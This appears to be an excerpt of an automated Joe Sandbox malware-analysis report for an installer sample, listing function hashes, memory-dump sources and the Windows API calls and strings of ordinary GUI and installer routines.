                                                                                                                        • Opcode ID: c7ee30231e81906061b89443ed90a62f27879d5cf56623c2ca64c2f77e4fdd2c
                                                                                                                        • Instruction ID: e3743907a9695e3f41d5217ee5fae2815589ab37ded54eeea85473c720610027
                                                                                                                        • Opcode Fuzzy Hash: c7ee30231e81906061b89443ed90a62f27879d5cf56623c2ca64c2f77e4fdd2c
                                                                                                                        • Instruction Fuzzy Hash: 8B316D71904A05EFCB20DF69CA44B9AFBB4FF05321F144269E424E77D0DB31AA91CB90
                                                                                                                        APIs
                                                                                                                        • NtdllDefWindowProc_W.NTDLL(?,-00002000,?,?,00867307,?,?,?,?,?,?,?,?,00867178,?,?), ref: 00868C00
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: NtdllProc_Window
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4255912815-0
                                                                                                                        • Opcode ID: 63f85adfb0d30733d3b84ac34caeacdebb13f7390948e2f19105dd4345360b1f
                                                                                                                        • Instruction ID: af3f042c74f7c67d5fdb8fb989013e6c0272247a7f69e5b15b06d55d8886b451
                                                                                                                        • Opcode Fuzzy Hash: 63f85adfb0d30733d3b84ac34caeacdebb13f7390948e2f19105dd4345360b1f
                                                                                                                        • Instruction Fuzzy Hash: 98F0A0B4104141DEE3508F14C8A8A69BBB6FB59316F4A47F6E08CC61A0CB35CE80DF30
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3f9a9b53c090ba865043bcdfc14e29686ec797fee7df6294884cc6d0890cd570
                                                                                                                        • Instruction ID: 38588357fc30b173382226d32ecb7af06bcedd39df7d69de756ec7e3a76a8d99
                                                                                                                        • Opcode Fuzzy Hash: 3f9a9b53c090ba865043bcdfc14e29686ec797fee7df6294884cc6d0890cd570
                                                                                                                        • Instruction Fuzzy Hash: 6671F7B1801B48CFE761CF78C94478ABBF0BB05324F144A5DD4A99B3D1D3B9A648CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: add25523fbe0612e6f8dfdf724655e9516a3c6b335f6fd2773d4f72098864461
                                                                                                                        • Instruction ID: c445fe63f81b8571df7f0f4cfb9f51880c3bf04900ffd324f05b7caec09f2bf9
                                                                                                                        • Opcode Fuzzy Hash: add25523fbe0612e6f8dfdf724655e9516a3c6b335f6fd2773d4f72098864461
                                                                                                                        • Instruction Fuzzy Hash: 5F31D0B0405B84DEE721CF29C658747BFF0BB15728F104A5DD4A64BB91D3BAA508CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a8f00b05a249a8deed5bf5c16cdf337868ce036e21b2badfeba24ffc4b0e0fb9
                                                                                                                        • Instruction ID: 1c83ba70fcd56663b6a0afec326cea211ec3eb763cce695efb58247e5077000e
                                                                                                                        • Opcode Fuzzy Hash: a8f00b05a249a8deed5bf5c16cdf337868ce036e21b2badfeba24ffc4b0e0fb9
                                                                                                                        • Instruction Fuzzy Hash: E62158B0804788DFD710CF58C904B8ABBF4FB0A314F1186AED455AB791E7B9AA44CF90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 746f774d4e2e8e6d857fe518a4eabffa0785a23a9c39e5c3d8d34e3720fd4cf1
                                                                                                                        • Instruction ID: 5bb45cdded01d96855cd079f62f333a111a50909d0652dc90a03ad79119fb99a
                                                                                                                        • Opcode Fuzzy Hash: 746f774d4e2e8e6d857fe518a4eabffa0785a23a9c39e5c3d8d34e3720fd4cf1
                                                                                                                        • Instruction Fuzzy Hash: 192158B0804788DFD710CF68C904B8ABBF4FB09314F1186AED455AB791E7B9AA44CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9c0997b02f21be64610ded2890943ea108373f4f10ec2922f6030107ccf97664
                                                                                                                        • Instruction ID: 6f0c811e1da0195ff3096637d7ceae207e5e0f94d912e027ba211f5f7f832573
                                                                                                                        • Opcode Fuzzy Hash: 9c0997b02f21be64610ded2890943ea108373f4f10ec2922f6030107ccf97664
                                                                                                                        • Instruction Fuzzy Hash: 8E110CB1904608DFCB40CF58C544B89BBF4FB09328F2086AEE8189B381D3769A06CF84
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000318,00000000,00000004), ref: 00877337
                                                                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00877345
                                                                                                                        • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0087735F
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00877377
                                                                                                                        • SendMessageW.USER32(?,0000130A,00000000,?), ref: 008773A8
                                                                                                                        • CreateRectRgn.GDI32(?,?,?,?), ref: 008773E2
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 008773F9
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00877415
                                                                                                                        • CreateRectRgn.GDI32(00000000,00000000,?,?), ref: 00877440
                                                                                                                        • CreateRectRgn.GDI32(?,?,?,?), ref: 0087745D
                                                                                                                        • SelectClipRgn.GDI32(00000000,00000000), ref: 00877474
                                                                                                                        • GetParent.USER32(?), ref: 00877484
                                                                                                                        • SendMessageW.USER32(00000000,00000136,?,?), ref: 00877495
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 008774AB
                                                                                                                        • DeleteObject.GDI32(?), ref: 008774B0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageRectSend$Create$DeleteObject$ClientClipParentSelect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1236051970-0
                                                                                                                        • Opcode ID: 345d9a8ec167b94b2f6c76bff150d213beca083c701c5b89ee0f691f94c30308
                                                                                                                        • Instruction ID: 1fd0fe6cfe632a5d18ddad862df5cd76aab1d25d80ed935664da81f887a70bac
                                                                                                                        • Opcode Fuzzy Hash: 345d9a8ec167b94b2f6c76bff150d213beca083c701c5b89ee0f691f94c30308
                                                                                                                        • Instruction Fuzzy Hash: 2D61FD72900219AFDB219FE4DD49FEEBBB9FF49710F104129F919AB2A0DB706941CB50
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(?,C7BA013E), ref: 0097E4C9
                                                                                                                        • IsWow64Process.KERNEL32(00000000), ref: 0097E4D0
                                                                                                                          • Part of subcall function 00960300: _wcsrchr.LIBVCRUNTIME ref: 00960339
                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 0097E551
                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 0097E5E7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcsrchr$Process$CurrentWow64
                                                                                                                        • String ID: "%s" $ /fvomus //$ /i //$ /p //$ EXE_CMD_LINE="%s "$ TRANSFORMS=":%d"$%s AI_SETUPEXEPATH="%s" SETUPEXEDIR="%s"$.x64
                                                                                                                        • API String ID: 657290924-2074823060
                                                                                                                        • Opcode ID: 381cd234dc2a2e17adbaca0b6c14228bf40fb2cadae71b476147744cb085497c
                                                                                                                        • Instruction ID: f30360118a65278eaa020aad38bb960a4617d457e3889f66c4d8cb3b7ce53203
                                                                                                                        • Opcode Fuzzy Hash: 381cd234dc2a2e17adbaca0b6c14228bf40fb2cadae71b476147744cb085497c
                                                                                                                        • Instruction Fuzzy Hash: 2AF1D431A006099FDB14DFA8C845BAEB7B9FF49314F1486ACE815EB2D1DB74AD04CB91
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00000043), ref: 0087BE18
                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitializeEmbeddedUI), ref: 0087BE31
                                                                                                                        • GetProcAddress.KERNEL32(00000043,ShutdownEmbeddedUI), ref: 0087BE3D
                                                                                                                        • GetProcAddress.KERNEL32(00000043,EmbeddedUIHandler), ref: 0087BE4A
                                                                                                                          • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HeapInit_thread_footer$AllocateLibraryLoadProcess
                                                                                                                        • String ID: build $173382f5$20.7$EmbeddedUIHandler$INAN$InitializeEmbeddedUI$SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll'$ShutdownEmbeddedUI
                                                                                                                        • API String ID: 2564778481-2084101031
                                                                                                                        • Opcode ID: be8af84de0fad3efd475c82b6166065ed41635b47b4be11a1f685c05fd86793f
                                                                                                                        • Instruction ID: 2d0ba5b34b0401d053ccd5b2305f127336c724a7be17874cab6cb7c4b16aa7cf
                                                                                                                        • Opcode Fuzzy Hash: be8af84de0fad3efd475c82b6166065ed41635b47b4be11a1f685c05fd86793f
                                                                                                                        • Instruction Fuzzy Hash: 2BD1BF71900209AFDB04DFA8CD55BEEBBB5FF04314F148629E815E72D1EB74AA04CBA1
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSection.KERNEL32(00B31550,C7BA013E,00000010,?), ref: 009944CC
                                                                                                                          • Part of subcall function 0084A190: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
                                                                                                                        • EnterCriticalSection.KERNEL32(?,C7BA013E,00000010,?), ref: 009944D9
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0099450B
                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000), ref: 00994514
                                                                                                                        • WriteFile.KERNEL32(00000000,00A895CD,48E9084D,?,00000000,00AAA26C,00000001,?,00000000,?,00000000), ref: 00994596
                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000), ref: 0099459F
                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 009945D5
                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 009945DE
                                                                                                                        • WriteFile.KERNEL32(00000000,00978683,1550B9FF,?,00000000,00AAD0FC,00000002,?,00000000,?,00000000,?,00000000,?,00000000), ref: 0099463F
                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00994648
                                                                                                                        • LeaveCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00994678
                                                                                                                          • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$BuffersFlushWrite$CriticalSection$AllocateEnterFindHeapInitializeLeaveResource
                                                                                                                        • String ID: v
                                                                                                                        • API String ID: 201293332-3261393531
                                                                                                                        • Opcode ID: 182ead1ea219338b84b1db402a35aa09ccc928e7975539054ca08e3af84afb39
                                                                                                                        • Instruction ID: befcb005b83c86b0f1ed8f9d82cadfab8e373a8e1a6a9ff3a94a289ff89f57b7
                                                                                                                        • Opcode Fuzzy Hash: 182ead1ea219338b84b1db402a35aa09ccc928e7975539054ca08e3af84afb39
                                                                                                                        • Instruction Fuzzy Hash: 8461AD71A01644EFEB01DFA8CD49FA9BBB8FF05314F144269F805DB2A1DB709915CBA1
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ParentWindowlstrcmp
                                                                                                                        • String ID: #32770
                                                                                                                        • API String ID: 3676684576-463685578
                                                                                                                        • Opcode ID: 0f1a0fb318c70437b0164d8cc980d4a83bb33c01d9a9b477b32c375053970ef7
                                                                                                                        • Instruction ID: f95120b3a23da5cc0ce1d172a65d2bf3d0e5c634912153d3d0ad17c2c6fd644c
                                                                                                                        • Opcode Fuzzy Hash: 0f1a0fb318c70437b0164d8cc980d4a83bb33c01d9a9b477b32c375053970ef7
                                                                                                                        • Instruction Fuzzy Hash: 97027D74A00209EFDB10CFA4C948BAEBBF5FF49715F144169F805EB290DB75A945CB21
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(00000000,tooltips_class32,00000000,80000063,80000000,80000000,80000000,80000000,?,00000000,00000000,C7BA013E), ref: 00875BE8
                                                                                                                          • Part of subcall function 00857B30: SetWindowLongW.USER32(?,000000FC,00000000), ref: 00857B66
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00875CEB
                                                                                                                        • SendMessageW.USER32(00000000,00000439,00000000,0000002C), ref: 00875CFF
                                                                                                                        • SendMessageW.USER32(00000000,00000421,00000003,?), ref: 00875D14
                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,0000012C), ref: 00875D29
                                                                                                                        • SendMessageW.USER32(?,000000D6,-00000001,00000000), ref: 00875D40
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00875D60
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00875D72
                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 00875DD4
                                                                                                                        • SendMessageW.USER32(00000000,00000411,00000001,0000002C), ref: 00875DE4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ClientCreateLongRectScreen
                                                                                                                        • String ID: tooltips_class32
                                                                                                                        • API String ID: 1468030502-1918224756
                                                                                                                        • Opcode ID: 256eab7faad5c4b5e2910a41ca2bd66d44da9afad256660d8840641869ab2fd0
                                                                                                                        • Instruction ID: b03a1ee65271563db7a833a3e682dc419514ed9b1055720187dd8233304f1b6c
                                                                                                                        • Opcode Fuzzy Hash: 256eab7faad5c4b5e2910a41ca2bd66d44da9afad256660d8840641869ab2fd0
                                                                                                                        • Instruction Fuzzy Hash: A4914071A00209AFDB24DFA4CD95FAEBBF9FB48300F10852AF516EB294D774A905CB50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 88dfa9b3c1f090e8c1910039696a55d8af190a117f623804170bb190ea5fc3b0
                                                                                                                        • Instruction ID: 9c37bc1c287da36de819068a9266b59669f067a20c2b07cdcaf44e180a87c50a
                                                                                                                        • Opcode Fuzzy Hash: 88dfa9b3c1f090e8c1910039696a55d8af190a117f623804170bb190ea5fc3b0
                                                                                                                        • Instruction Fuzzy Hash: 01A1E671A00205AFDB20AF64DC85FAF7BB8FF96710F104169F905AB291DB75E901CBA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0096AEB0: LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,?,009762E1,?,C7BA013E,?,?), ref: 0096AECB
                                                                                                                          • Part of subcall function 0096AEB0: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 0096AEE1
                                                                                                                          • Part of subcall function 0096AEB0: FreeLibrary.KERNEL32(00000000), ref: 0096AF1A
                                                                                                                        • GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104,C7BA013E,?,?), ref: 009764C0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
